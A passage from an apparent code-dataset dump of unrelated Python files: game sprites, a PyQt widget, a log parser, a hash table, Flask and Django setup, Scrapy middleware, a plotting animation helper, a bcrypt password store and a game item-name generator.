self.pos += self.vel + 0.5 * self.acc
# wrap around the sides of the screen
"""if self.pos.x > WIDTH:
self.pos.x = 0
if self.pos.x < 0:
self.pos.x = WIDTH"""
self.rect.midbottom = self.pos
self.mask = pg.mask.from_surface(self.image)
def rotate(self):
"""now = pg.time.get_ticks()
self.last_update = now"""
self.rot = (self.vel.y * -3)
if self.rot < -90:
self.rot = -90
new_image = pg.transform.rotate(self.bird_sprites[self.sprite_frame], self.rot)
old_center = self.rect.center
self.image = new_image
self.rect = self.image.get_rect()
self.rect.center = old_center
# self.animate()
def animate(self):
now = pg.time.get_ticks()
if now - self.last_update > 100:
self.last_update = now
self.sprite_frame = (self.sprite_frame + 1)% 4
self.image = self.bird_sprites[self.sprite_frame]
class Platform(pg.sprite.Sprite):
def __init__(self, x, y, image):
pg.sprite.Sprite.__init__(self)
self.image = image
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
self.scored = False
class Spritesheet:
# utility class for loading and parsing sprites
def __init__(self, filename):
self.spritesheet = pg.image.load(filename).convert_alpha()
def get_image(self, x, y, width, height):
# grab and image out of a larger spritesheet
image = pg.Surface((width, height))
image.blit(self.spritesheet, (0, 0), (x, y, width, height))
image = pg.transform.scale(image, (width * 2, height * 2))
image.set_colorkey(BLACK)
return image
|
996,142 | 6d2fd7374e663bd98ba39ec80118f5c6fd96928e | '''
Created on 2016-08-11
@author: Sun Tianchen
'''
from PyQt4 import QtCore, QtGui
class ColorWidegt(QtGui.QWidget):
"""docstring for ColorWidegt"""
def __init__(self, parent=None):
'''
default values:
Pen:
Size:
Tense:
'''
QtGui.QWidget.__init__(self, parent=parent)
self.buttons = {}
self.gridLayout = QtGui.QGridLayout(self)
self.cd = QtGui.QColorDialog()
self.cd.setWindowFlags(QtCore.Qt.Widget)
self.cd.setOptions(QtGui.QColorDialog.DontUseNativeDialog)
self.cd.setOptions(QtGui.QColorDialog.NoButtons)
self.gridLayout.addWidget(self.cd)
self.hblayout = QtGui.QHBoxLayout()
self.hblayout2 = QtGui.QHBoxLayout()
self.hblayout3 = QtGui.QHBoxLayout()
## slider
self.psSl = QtGui.QSlider(QtCore.Qt.Horizontal)
self.psSl.setMinimum(1)
self.psSl.setMaximum(30)
self.psSl.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
self.psLabel = QtGui.QLabel("Pen size")
self.psText = QtGui.QLineEdit()
self.psText.setValidator(QtGui.QIntValidator(1, 30, self.psText))
self.psText.setMaximumWidth(30)
self.psText.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.psText.setText(str(self.psSl.value()))
self.pxLabel = QtGui.QLabel("px")
self.hblayout.addWidget(self.psLabel)
self.hblayout.addWidget(self.psSl)
self.hblayout.addWidget(self.psText)
self.hblayout.addWidget(self.psLabel)
#self.hblayout.addWidget(self.pxLabel)
self.gridLayout.addLayout(self.hblayout, 1, 0, QtCore.Qt.AlignLeft)
## slider 2
self.tsSl = QtGui.QSlider(QtCore.Qt.Horizontal)
self.tsSl.setMinimum(30)
self.tsSl.setMaximum(70)
self.tsSl.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
self.tsLabel = QtGui.QLabel("Tense")
self.tsText = QtGui.QLineEdit()
self.tsText.setValidator(QtGui.QDoubleValidator(0.3, 0.7, 2, self.tsText))
self.tsText.setMaximumWidth(30)
self.tsText.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
self.tsText.setText(str(self.tsSl.value()))
self.hblayout.addWidget(self.tsLabel)
self.hblayout.addWidget(self.tsSl)
self.hblayout.addWidget(self.tsText)
self.gridLayout.addLayout(self.hblayout2, 2, 0, QtCore.Qt.AlignLeft)
## buttons
self.okBtn = QtGui.QPushButton("OK")
self.cancelBtn = QtGui.QPushButton("Cancel")
self.okBtn.setMaximumWidth(50)
self.cancelBtn.setMaximumWidth(50)
self.hblayout3.addWidget(self.okBtn)
self.hblayout3.addWidget(self.cancelBtn)
self.gridLayout.addLayout(self.hblayout3, 3, 0)
#self.setFixedSize(self.size())
## set up dict
self.buttons['cancel'] = self.cancelBtn
self.buttons['ok'] = self.okBtn
self.buttons['color'] = self.cd
self.buttons['size'] = self.psSl
self.buttons['tense'] = self.tsSl
## connect signal and slots
self.psText.textEdited.connect(self.ps_line_text_changed)
self.psSl.valueChanged.connect(self.ps_bar_changed)
self.tsText.textEdited.connect(self.ts_line_text_changed)
self.tsSl.valueChanged.connect(self.ts_bar_changed)
## store current value
self.cur_color = QtGui.QColor(79,106,25)
self.cur_tense = 0.4
self.cur_size = 5
self.restore_value()
def ok_clicked(self):
pass
def cancel_click(self):
pass
def ps_bar_changed(self, value):
self.psText.setText(str(value))
def ps_line_text_changed(self):
if len(self.psText.text()) > 0:
self.psSl.setValue(int(self.psText.text()))
def ts_bar_changed(self, value):
self.tsText.setText(str(value/100.))
def ts_line_text_changed(self):
if len(self.tsText.text()) > 0:
self.tsSl.setValue(int(float(self.tsText.text()) * 100))
def set_cur_value(self):
self.cur_color = self.buttons['color'].currentColor()
self.cur_size = self.buttons['size'].value()
self.cur_tense = self.buttons['tense'].value() / 100.
def restore_value(self):
## color -- color Dialog
## size -- psSl, psText
## tense -- tsSl, tsText
self.cd.setCurrentColor(self.cur_color)
self.psSl.setValue(self.cur_size)
self.psText.setText(str(self.cur_size))
self.tsSl.setValue(100 * self.cur_tense)
self.tsText.setText(str(self.cur_tense))
app = QtGui.QApplication([])
'''
win = QtGui.QMainWindow()
win.setWindowTitle('pyqtgraph example')
cw = ColorWidegt()
cd = QtGui.QColorDialog()
cd.setOptions(QtGui.QColorDialog.DontUseNativeDialog)
cd.setOptions(QtGui.QColorDialog.NoButtons)
win.setCentralWidget(cd)
layout = QtGui.QGridLayout()
win.show()
'''
#cw = ColorWidegt()
#cw.show()
if __name__ == '__main__':
import sys
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_() |
996,143 | 96c4ae9fe1ea9dc34a76fb5ed0c4b22c3446f54f | #!/usr/bin/env python3
import re
import csv
import operator
error_message={}
user_statistics={}
pattern_error=r"ERROR ([\w ]+)"
pattern_username=r"\(([\w.]+)\)"
with open("syslog.log") as f:
for line in f:
result_user=re.search(pattern_username,line)
result_user=str(result_user.group(1)).strip()
if "ERROR" in line:
result=re.search(pattern_error,line)
result=result.group()
result=str(result).strip()
if result in error_message:
error_message[result] += 1
else:
error_message[result] = 1
if result_user in user_statistics:
user_statistics[result_user][1] += 1
else:
user_statistics[result_user] = [0,1]
else:
if result_user in user_statistics:
user_statistics[result_user][0] += 1
else:
user_statistics[result_user] = [1,0]
usr_stst=[]
err_msg=[]
for item in user_statistics:
d={}
d["Username"] = item
d["INFO"] = user_statistics[item][0]
d["ERROR"] = user_statistics[item][1]
usr_stst.append(d)
for item in sorted(error_message.items(), key = operator.itemgetter(1), reverse=True):
d={}
d["Error"] = item[0]
d["Count"] = item[1]
err_msg.append(d)
keys = ["Username", "INFO", "ERROR"]
with open("user_statistics.csv","w") as file:
writer=csv.DictWriter(file,fieldnames=keys)
writer.writeheader()
writer.writerows(usr_stst)
keys = ["Error", "Count"]
with open("error_message.csv","w") as file:
writer=csv.DictWriter(file,fieldnames=keys)
writer.writeheader()
writer.writerows(err_msg) |
996,144 | 8fc8aa0e1c56212f3c1fbfead75e11c7d663ab15 | # Written by Christian Abdelmassih, Alexandra Runhem
class Atom():
def __init__(self, name, weight):
self.name = name
self.weight = weight
class Hashtabell():
def __init__(self, length):
self.length=length*2
self.hash_table=[]
self.used_indexes = []
for i in range (0,self.length): #Hashtabell måste ha 50% luft
self.hash_table.append(Atom(None,None))
def put(self, key, atom):
index = hashing(key, self.length)
state = self.index_value_type(index)
if state == "Empty":
self.hash_table[index] = atom
elif state == "Occupied": # Create
old_atom = self.hash_table[index]
new_hash_table = Hashtabell(self.length) # Create new hashtable
new_hash_table.put2(old_atom.name, old_atom) # put Old atom in new hashtable
new_hash_table.put2(atom.name, atom) # put New atom in new hashtable
self.hash_table[index] = new_hash_table # insert new hashtable in the old location of Old atom
elif state == "Hashtable":
self.hash_table[index].put2(atom.name, atom)
else:
print("ERROR! PUT")
# Put function used when atom colission occurs to put into the other hashtable
def put2(self, key, atom):
index = hashing_2(key, self.length)
state = self.index_value_type(index)
if state == "Empty":
self.hash_table[index] = atom
else: # Linear probing, in case colission occurs in the other hashtable
self.linear_probe(atom, index)
# Returns an index value which is not occupied
def linear_probe(self, atom, index):
for i in range(1, self.length):
index += 1
state = self.index_value_type(index)
if index > self.length:
index = index - self.length
if state == "Empty":
self.hash_table[index] = atom
break
if i == self.length:
print("RAN OUT OF INDEXES")
# Returns the type of value which is located at the index
def index_value_type(self, index):
something = self.hash_table[index]
if is_atom(something):
atom = something
if atom.name == None:
return "Empty"
if atom.name != None:
return "Occupied"
else:
print("ERROR ISEMPTY")
elif is_hashtable_object(something):
return "Hashtable"
else:
print("ERROR TYPE ")
print(something)
def get(self, atom_name):
index = hashing(atom_name, self.length)
something = self.hash_table[index]
if is_atom(something):
atom = something
if atom.name == atom_name:
return atom
else:
raise KeyError
elif is_hashtable_object(something):
new_hash_table_object = something
index = hashing_2(atom_name, new_hash_table_object.length)
for i in range(0,self.length):
some_atom = new_hash_table_object.hash_table[index]
if some_atom.name == None:
raise KeyError
break
if some_atom.name == atom_name:
atom = some_atom
return atom
index += 1
else:
print("ERROR GET")
# converts strings to ascii number strings
def string_to_ascii(in_string):
convert_list = list(in_string)
for i in range(0,len(convert_list)):
letter = convert_list[i]
convert_list[i] = str(ord(letter))
ascii_list = convert_list
return ascii_list
# returns index value
def hashing(in_value, hash_table_length, tweak_factor = 1):
ascii_list = string_to_ascii(in_value)
if len(ascii_list) == 1:
ascii_value = int(ascii_list[0])
else:
ascii_list[1] = ascii_list[1]*tweak_factor
ascii_value = int("".join(ascii_list))
if ascii_value > hash_table_length:
hash_value = ascii_value % hash_table_length
else:
hash_value = ascii_value
return hash_value
# 2nd hashing function used for the 2nd degree hashtables
def hashing_2(in_value, hash_table_length):
hash_value = hashing(in_value, hash_table_length, tweak_factor = 3)
return hash_value
# Checks if a value is a atom objct
def is_atom(something):
try:
something.name
something.weight
return True
except:
return False
# Checks if a value is a hashtable objct
def is_hashtable_object(something):
try:
something.length
something.hash_table
return True
except:
return False
|
996,145 | 501eade2ad1dfc20040256e715a7db11e45632e2 | #coding:utf-8
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import urllib2
import psycopg2
# url = 'http://stock.finance.sina.com.cn/fundInfo/api/openapi.php/CaihuiFundInfoService.getNav?symbol=003803&page=2'
conn = psycopg2.connect("dbname=postgres user=postgres")
cur = conn.cursor()
cur.execute("CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);")
cur.execute("INSERT INTO test (num, data) VALUES (%s, %s)" , (100, "abcdef"))
cur.execute("SELECT * FROM test;")
print cur.fetchone()
conn.commit()
cur.close()
conn.close() |
996,146 | 2a834482daf86456d368a8470646fb2f9cce5d92 | l1=[5,20,15,20,25,50,20]
l2=[]
l3=[]
for i in range(len(l1)):
if(l1[i]!=20):
l2.append(l1[i])
print(l2)
''' else:
l3.append(l1[i])'''
|
996,147 | 1b2f78a6e0985a5f41eb8e6b1640c0f864be0133 | # -*- coding: utf-8 -*-
import random
import base64
import time,urllib,json
from redis import Redis
#from settings import PROXIES
class RandomUserAgent(object):
"""Randomly rotate user agents based on a list of predefined ones"""
def __init__(self, agents):
self.agents = agents
@classmethod
def from_crawler(cls, crawler):
return cls(crawler.settings.getlist('USER_AGENTS'))
def process_request(self, request, spider):
#print "**************************" + random.choice(self.agents)
request.headers.setdefault('User-Agent', random.choice(self.agents))
class ProxyMiddleware(object):
def process_request(self, request, spider):
r = Redis(host='192.168.6.4',port=6379)
proxy = r.srandmember("GZYF_Test:Proxy_Pool",1)[0]
#print "**************ProxyMiddleware no pass************ %s"%(proxy)
request.meta['proxy'] = "http://%s" % (proxy)
|
996,148 | 599be2b22dce3cc8dcc8962020b8dbd1645f6660 | from flask import Flask
from config import app_config
from flask_jwt_extended import JWTManager
from .db import create_tables
def create_app(config_name):
""" creates a flask instance according to config passed """
app = Flask(__name__)
app.config.from_object(app_config[config_name])
# versions of api
from app.api.v2 import version2 as v2
app.register_blueprint(v2)
# registered JWT manager
app.config['JWT_SECRET_KEY'] = 'owezzy'
jwt = JWTManager(app)
create_tables()
return app
|
996,149 | 08f60e7c32d4ebf478eea0faebdd09007809a2d4 | from django.db import models
import datetime
from django.utils import timezone
# Create your models here.
class Category(models.Model):
category_name = models.CharField(max_length=20)
def __str__(self):
return self.category_name
class Shop(models.Model):
category = models.ForeignKey(Category, on_delete=models.CASCADE)
shop_name = models.CharField(max_length=200)
explanation = models.CharField(max_length=200)
def __str__(self):
return self.shop_name
def shop_explanation(self):
return self.explanation
class Review(models.Model):
name = models.ForeignKey(Shop, on_delete=models.CASCADE)
review_date = models.DateTimeField('date published')
score = models.IntegerField(default=0)
comment = models.CharField(max_length=200)
def __str__(self):
return self.comment
def shop_score(self):
return self.score |
996,150 | 50cf72c894426fa63405649aa0801bb2db91e60a | from flask import render_template, Flask
from util import findroot
import os
RPATH = findroot()
SPATH = os.path.join( RPATH, 'static' )
TPATH = os.path.join( RPATH, 'app', 'invre', 'templates' )
print( RPATH )
print( SPATH )
print( TPATH )
Wine = Flask(
__name__,
template_folder = TPATH,
static_folder = SPATH,
instance_relative_config = True
)
@Wine.route( '/' )
def landing():
return render_template( 'index.html' )
|
996,151 | 8399f58f6fe4a128f89bc18c3eec6877d7731851 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 27 12:44:45 2020
@author: corkep
"""
#matplotlib inline
# line.set_data()
# text.set_position()
# quiver.set_offsets(), quiver.set_UVC()
# FancyArrow.set_xy()
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import animation
import spatialmath.base as tr
import numpy as np
import math
class Animate:
def __init__(self, axes=None, dims=None, projection='ortho', labels=['X', 'Y', 'Z'], **kwargs):
self.displaylist = []
if axes is None:
# create an axes
fig = plt.gcf()
if fig.axes == []:
# no axes in the figure, create a 3D axes
axes = fig.add_subplot(111, projection='3d', proj_type=projection)
axes.set_xlabel(labels[0])
axes.set_ylabel(labels[1])
axes.set_zlabel(labels[2])
axes.autoscale(enable=True, axis='both')
else:
# reuse an existing axis
axes = plt.gca()
if dims is not None:
if len(dims) == 2:
dims = dims * 3
axes.set_xlim(dims[0:2])
axes.set_ylim(dims[2:4])
axes.set_zlim(dims[4:6])
#ax.set_aspect('equal')
self.ax = axes
#set flag for 2d or 3d axes, flag errors on the methods called later
def draw(self, T):
for x in self.displaylist:
x.draw(T)
def run(self, movie=None, axes=None, repeat=True, interval=50, nframes=100, **kwargs):
def update(frame, a):
s = frame/100.0;
T = tr.transl(0.5*s, 0.5*s, 0.5*s) @ tr.trotx(math.pi*s)
a.draw(T)
return a.artists()
# blit leaves a trail and first frame
if movie is not None:
repeat = False
ani = animation.FuncAnimation(fig=plt.gcf(), func=update, frames=range(0,nframes), fargs=(self,), blit=False, interval=interval, repeat=repeat)
if movie is None:
plt.show()
else:
# Set up formatting for the movie files
print('creating movie', movie)
#plt.rcParams['animation.ffmpeg_path'] = '/usr/local/bin/ffmpeg'
FFwriter=animation.FFMpegWriter(fps=10, extra_args=['-vcodec', 'libx264'])
ani.save(movie, writer=FFwriter)
# TODO needs conda install -c conda-forge ffmpeg
def __repr__(self):
return ', '.join([x.type for x in self.displaylist])
def artists(self):
return [x.h for x in self.displaylist]
#------------------- plot()
class Line:
def __init__(self, anim, h, xs, ys, zs):
p = zip(xs, ys, zs)
self.p = np.vstack([xs, ys, zs, [1,1]])
self.h = h
self.type = 'line'
self.anim = anim
def draw(self, T):
p = T @ self.p
self.h.set_data(p[0,:], p[1,:])
self.h.set_3d_properties(p[2,:])
def plot(self, xs, ys, zs, *args, **kwargs):
h, = self.ax.plot(xs, ys, zs, *args, **kwargs)
self.displaylist.append(Animate.Line(self, h, xs, ys, zs))
#------------------- quiver()
class Quiver:
def __init__(self, anim, h):
self.type = 'quiver'
self.anim = anim
# ._segments3d is 3x2x3
# first index: line segment in the collection
# second index: 0 = start, 1 = end
# third index: x, y, z components
# https://stackoverflow.com/questions/48911643/set-uvc-equivilent-for-a-3d-quiver-plot-in-matplotlib
# turn to homogeneous form, with columns per point
self.p = np.vstack( [h._segments3d.reshape(6,3).T, np.ones((1,6))])
self.h = h
self.type = 'arrow'
self.anim = anim
def draw(self, T):
p = T @ self.p
# reshape it
p = (p[0:3,:].T).reshape(3,2,3)
self.h.set_segments(p)
def quiver(self, x, y, z, u, v, w, *args, **kwargs):
h = self.ax.quiver(x, y, z, u, v, w, *args, **kwargs)
self.displaylist.append(Animate.Quiver(self, h))
#------------------- text()
class Text:
def __init__(self, anim, h, x, y, z):
self.type = 'text'
self.h = h
self.p = np.r_[x, y, z, 1]
self.anim = anim
def draw(self, T):
p = T @ self.p
# x2, y2, _ = proj3d.proj_transform(p[0], p[1], p[2], self.anim.ax.get_proj())
# self.h.set_position((x2, y2))
self.h.set_position((p[0], p[1]))
self.h.set_3d_properties(p[2])
def text(self, x, y, z, *args, **kwargs):
h = self.ax.text3D(x, y, z, *args, **kwargs)
self.displaylist.append(Animate.Text(self, h, x, y, z))
#------------------- scatter()
def scatter(self, **kwargs):
pass
#------------------- wrappers for Axes primitives
def set_xlim(self, *args, **kwargs):
self.ax.set_xlim(*args, **kwargs)
def set_ylim(self, *args, **kwargs):
self.ax.set_ylim(*args, **kwargs)
def set_zlim(self, *args, **kwargs):
self.ax.set_zlim(*args, **kwargs)
def set_xlabel(self, *args, **kwargs):
self.ax.set_xlabel(*args, **kwargs)
def set_ylabel(self, *args, **kwargs):
self.ax.set_ylabel(*args, **kwargs)
def set_zlabel(self, *args, **kwargs):
self.ax.set_zlabel(*args, **kwargs)
def tranimate(T, **kwargs):
anim = Animate(**kwargs)
tr.trplot(T, axes=anim, **kwargs)
anim.run(**kwargs)
tranimate( tr.transl(0,0,0), frame='A', arrow=False, dims=[0,5], movie='bob.mp4')
# a = trplot_a( tr.transl(1,2,3), frame='A', rviz=True, width=1)
# print(a)
# a.draw(tr.transl(0, 0, -1))
# trplot_a( tr.transl(3,1, 2), color='red', width=3, frame='B')
# trplot_a( tr.transl(4, 3, 1)@tr.trotx(math.pi/3), color='green', frame='c')
|
996,152 | e6bed97d9f564056675d78a45f07c180c05cdcf5 | import re
import json
from openpyxl.styles import Font, colors, Alignment
import sys
import os
sys.path.append(os.getcwd() + '\\PortCommons')
import reg_class
''''
本class完成:
调用请求类发送请求并接受响应
根据响应结果进行判断是否正确
把执行结果保存到excel
'''
class InterfaceTest:
def interface_test(self, num, interface_name, method, form, full_url, data, check_point, s, i, log):
# 调用返回类
rp = reg_class.MyRequests()
# 判断传入的请求方法是否是get方法
if (method.lower() == "get"):
http_code, response, time = rp.get_requests(full_url, data)
# print("get_requests=",response)
elif (method.lower() == "post" and form.lower() == "json"):
http_code, response, time = rp.post_json(full_url, data)
# print("post_requests_json=",response)
elif (method.lower() == "post" and form.lower() == "form"):
http_code, response, time = rp.post_form(full_url, data)
# print("post_requests_form=",response)
else:
log.error(num + " " + interface_name + ":请求方法错误,请确认[请求方法]字段是否正确!")
return 400, method.lower()
# print("请求方法错误,请确认[请求方法]字段是否正确!")
# response=str(response)#re.search()是字符串的匹配,需要将返回的字典类型转换为字符串类型
# print("response=",response)
# print(response)
# print(re.search("'error_code': 0",response).group())
# print(check_point)
# check_point=str(check_point)
'''
从excel获取到check_point="error_code": 0,error_code上面是双引号;而返回的response=
{'error_code': 0, 'name': '小强软件测试疯狂讲义', 'reason': 'successed', 'price': 666}里面的'error_code': 0是单引号,导致
re.search(check_point,response)时一直匹配不成功,所以要把从excel里获取到的error_code上的双引号替换成单引号,用re.sub()方法替换
'''
# check_point=re.sub('"',"'",check_point)
# print(check_point)
'''
这里需要注意,咱们之前处理的都是把json类型转换成了python类型进行的
处理完之后,为了显示效果,最后又转换成了json类型了,用的方法就是json.dumps()
其中的参数ensure_ascii=False是为了解决中文编码
'''
response_json = json.dumps(response, ensure_ascii=False)
# print("response_json=",response_json)
if (http_code == 200):
if (re.search(check_point, response_json)):
# s=wb.get_sheet_by_name("TestCase")#获取TestCase工作表名的对象
# print(i)#需要从run()传入当前循环i值
s.cell(row=i, column=11).value = "成功"
s.cell(row=i, column=12).value = response_json
s.cell(row=i, column=13).value = time
# 写入日志>>接口测试成功信息
# 先注释,今后放开>>>>
# log.info(">>编号=" + num + " " + "接口名称=" + interface_name + ",成功" + " " + "http状态码=" + str(http_code) \
# + " " + "响应时间=" + str(time) + "秒" + "\n" + "响应内容=" + response_json)
else:
myfont = Font(color=colors.RED)
s.cell(row=i, column=11).value = "失败"
# 失败的单元格设置成红色
s.cell(row=i, column=11).font = myfont
s.cell(row=i, column=12).value = response_json
log.error(num + " " + interface_name + ",失败!, [ " + str(http_code) + " ], " + response_json)
return 2001, response_json
else:
myfont = Font(color=colors.RED)
s.cell(row=i, column=11).value = "失败"
# 失败的单元格设置成红色
s.cell(row=i, column=11).font = myfont
s.cell(row=i, column=12).value = response_json
log.error(num + " " + interface_name + ",失败!,[" + str(http_code) + " ], " + response_json)
# 返回response响应结果,run_testcase里需要用来获取关联参数的值
return response
# 原来每次循环的时候都重新打开了一下excel,把之前写的又给清空了,应该把测试的sheet对象传过来了
# wb.save("E:\\Python_study\\work\\project\\reports\\testcase_report.xlsx")
# 这样循环写完之后,可以回到run()函数进行excel的保存 |
996,153 | 7510172ab9dd4ef2448dc37287797abc96297741 | import netbox_agent.dmidecode as dmidecode
from netbox_agent.config import config
from netbox_agent.logging import logging # NOQA
from netbox_agent.vendors.dell import DellHost
from netbox_agent.vendors.generic import GenericHost
from netbox_agent.vendors.hp import HPHost
from netbox_agent.vendors.qct import QCTHost
from netbox_agent.vendors.supermicro import SupermicroHost
MANUFACTURERS = {
'Dell Inc.': DellHost,
'HP': HPHost,
'HPE': HPHost,
'Supermicro': SupermicroHost,
'Quanta Cloud Technology Inc.': QCTHost,
'Generic': GenericHost,
}
def run(config):
manufacturer = dmidecode.get_by_type('Chassis')[0].get('Manufacturer')
try:
server = MANUFACTURERS[manufacturer](dmi=dmidecode)
except KeyError:
server = GenericHost
if config.debug:
server.print_debug()
if config.register:
server.netbox_create(config)
if config.update_all or config.update_network or config.update_location or \
config.update_inventory or config.update_psu:
server.netbox_update(config)
return True
def main():
return run(config)
if __name__ == '__main__':
main()
|
996,154 | 4ef161653006fec18b3db89e0c988e6fa18d362a | import logging
logging.basicConfig(level=logging.DEBUG)
import sqlite3
from sqlite3 import Error
import datetime
import secrets
import bcrypt
idLength = 8
def dbConnect(dbFileName):
db = sqlite3.connect(dbFileName)
db.row_factory = sqlite3.Row
return db
def authenticate(dbFileName, channels):
db = dbConnect(dbFileName)
c = db.cursor()
ids = [channel["id"] for channel in channels]
c.execute('SELECT id, passwordHash FROM passwords WHERE id in ({seq})'.format(
seq=','.join(['?']*len(ids))
), ids)
rows = {};
foundRows = c.fetchall()
for row in foundRows:
rows[row["id"]] = row["passwordHash"]
success = True
for channel in channels:
password = channel["password"]
passwordHash = ' '
if channel["id"] in rows:
passwordHash = rows[channel["id"]]
else:
success = False
success = success and bcrypt.checkpw(password, passwordHash)
return success
def generateId():
id = secrets.token_bytes(idLength)
while id[0] == 0:
id = secrets.token_bytes(idLength)
return id
def createChannel(dbFileName, password):
db = dbConnect(dbFileName)
c = db.cursor()
id = generateId()
salt = bcrypt.gensalt()
passwordHash = bcrypt.hashpw(password, salt)
inserted = False
for i in range(1000000):
try:
c.execute('INSERT INTO passwords VALUES (?, ?)', (id,passwordHash))
db.commit()
inserted = True
break
except:
id = generateId()
if inserted:
return id;
else:
return None
def init(dbFileName):
db = dbConnect(dbFileName)
db.row_factory = sqlite3.Row
c = db.cursor()
try: # initialize database
c.execute('CREATE TABLE versions (version int, date text)')
n = datetime.datetime.now()
c.execute('INSERT INTO versions VALUES (0, ?)', (n,))
# save changes
db.commit()
except Error as e:
# initializing may fail if it has already been initialized
pass
# upgrade tables if a new version is available
# upgrading from one version to another must not fail
# throw if an upgrade does not work
c.execute('SELECT version FROM versions ORDER BY version DESC LIMIT 1')
lastVersion = c.fetchone();
if lastVersion['version'] < 1:
# setup tables
c.execute('CREATE TABLE passwords (id blob PRIMARY KEY, passwordHash text NOT NULL)')
# update version
n = datetime.datetime.now()
c.execute('INSERT INTO versions VALUES (1, ?)', (n,))
# save changes
db.commit()
elif lastVersion['version'] < 2:
pass # version 2 has not yet been defined
"""
dbFileName = "./tmp1.db"
initDb(dbFileName)
db = sqlite3.connect(dbFileName)
c = db.cursor()
id = secrets.token_bytes(8)
password = secrets.token_bytes(255)
#c.execute("INSERT INTO stocks VALUES (?,?)", (id,password))
id = secrets.token_bytes(8)
password = secrets.token_bytes(255)
#c.execute("INSERT INTO stocks VALUES (?,?)", (id,password))
db.commit()
c.execute("SELECT id FROM stocks")
rows = c.fetchall()
print(rows)
db.close()
""" |
996,155 | d35bf22b54da5c4a84e533b429d196145548e76f | print("Hello from Jozef Marusak")
|
996,156 | 74bb97d972536ae193d7553fcd53654ed27a0c43 | # -*- coding: cp1252 -*-
import random
import copy
import itertools
import profile
materialType = ("Naked", "Woven Lint", "Hair", "Wax", "Cotton", "Wool", "Paper", "Egg Carton", "Cardboard",
"Soft Plastic", "Rodent Pelt", "Deer Pelt", "Snake Hide", "Wolf Pelt", "Buffalo Pelt", "Leather",
"Balsa", "Bamboo", "Ivory", "Stone", "Cured Leather", "Rhino Hide", "Crocodile Hide", "Shark Hide",
"Fir Wood", "Pine Wood", "Cedar Wood", "Spruce Wood", "Tin", "Lead", "Gold", "Copper", "Silver",
"Teac Wood", "Maple", "Beechwood", "Oak", "Royal Oak", "Walnut", "Mahogany", "Rosewood", "Tamarind",
"Ironwood", "Ebony", "Hardened Plastic", "Pure Aluminium", "Duralmin", "Silumin", "Hiduminium",
"Cast Brass", "Common Brass", "Naval Brass", "High Tensile Brass", "Phosphor Bronze", "Leaded Bronze",
"Silicon Bronze", "Aluminium Bronze", "Manganese Bronze", "Pig Iron", "Grey Cast Iron",
"White Cast Iron", "Nondular Iron", "Magnesium Alloy", "Low Carbon Steel", "Mild Steel",
"Medium Carbon Steel", "High Carbon Steel", "Ultra High Carbon Steel", "Spring Steel",
"Stainless Steel", "Weathering Steel", "High Tensile Steel", "Wootz Steel", "Kevlar", "Ceramic",
"Kevlar and Ceramic", "Depleted Uranium", "Nanotube", "Starlite", "Reactive Crystal", "Nanite")
qualityType = ("Shattered", "Broken", "Bent", "Cracked", "Worn", "Poor", "Okay", "Good", "Great", "Pristine", "Splendid", "Flawless", "Radiant", "Divine")
qualityMod = ( -1.5, -1.3, -1.1, -0.9, -0.6, -0.3, -0.1, 0, 0.3, 0.5, 0.7, 0.9, 1.2, 1.5)
itemType = ("Helmet", "Armour Shirt", "Armour Pants", "Shield", "Sword", "Knife", "Axe", "Sling", "Spear", "Bow", "Ward")
itemEffect = ("Tough", "Enduring", "Immortal",
"Fertile", "Verdant", "Overgrown",
"Shiny", "Glowing", "Sparkling",
"Solar", "Lunar", "Starlit", "Martian", "Shadow",
"Heated", "Flaming", "Molten",
"Sparking", "Arcing", "Thunderous",
"Chill", "Frosty", "Frigid",
"Sharp", "Keen", "Dismembering",
"Normal", "Fire", "Fighting", "Water", "Flying", "Grass", "Poison", "Electric", "Ground", "Psychic", "Rock", "Ice", "Bug", "Dragon", "Ghost", "Dark", "Steel", "Fairy",
"Gooey","Slimey","Lesser","Greater","Giant","Tiny","Oozing","Spikey","Cosmic","Melting","Smelly","Stinky","Crusty")
#first names from US census beaureau (~1950) and wikipedia (~1050)
firstNames = ("James", "John", "Robert", "Michael", "William", "David", "Richard", "Charles", "Joseph", "Thomas", "Christopher", "Daniel", "Paul", "Mark", "Donald", "George", "Kenneth", "Steven", "Edward", "Brian", "Ronald", "Anthony", "Kevin", "Jason",
"Matthew", "Gary", "Timothy", "Jose", "Larry", "Jeffrey", "Frank", "Scott", "Eric", "Stephen", "Andrew", "Raymond", "Gregory", "Joshua", "Jerry", "Dennis", "Walter", "Patrick", "Peter", "Harold", "Douglas", "Henry", "Carl", "Arthur",
"Ryan", "Roger", "Joe", "Juan", "Jack", "Albert", "Jonathan", "Justin", "Terry", "Gerald", "Keith", "Samuel", "Willie", "Lawrence", "Ralph", "Nicholas", "Roy", "Benjamin", "Bruce", "Brandon", "Adam", "Fred", "Harry", "Wayne", "Billy",
"Steve", "Louis", "Jeremy", "Aaron", "Randy", "Eugene", "Howard", "Carlos", "Russell", "Bobby", "Victor", "Martin", "Ernest", "Phillip", "Todd", "Jesse", "Craig", "Alan", "Shawn", "Chris", "Clarence", "Philip", "Sean", "Johnny", "Earl",
"Jimmy", "Antonio", "Bryan", "Danny", "Tony", "Luis", "Mike", "Leonard", "Stanley", "Nathan", "Dale", "Manuel", "Curtis", "Rodney", "Norman", "Allen", "Marvin", "Vincent", "Glenn", "Jeff", "Jeffery", "Travis", "Chad", "Jacob", "Alfred",
"Lee", "Melvin", "Francis", "Kyle", "Bradley", "Herbert", "Jesus", "Frederick", "Ray", "Joel", "Edwin", "Don", "Eddie", "Ricky", "Randall", "Troy", "Barry", "Alexander", "Bernard", "Leroy", "Mario", "Francisco", "Marcus", "Clifford",
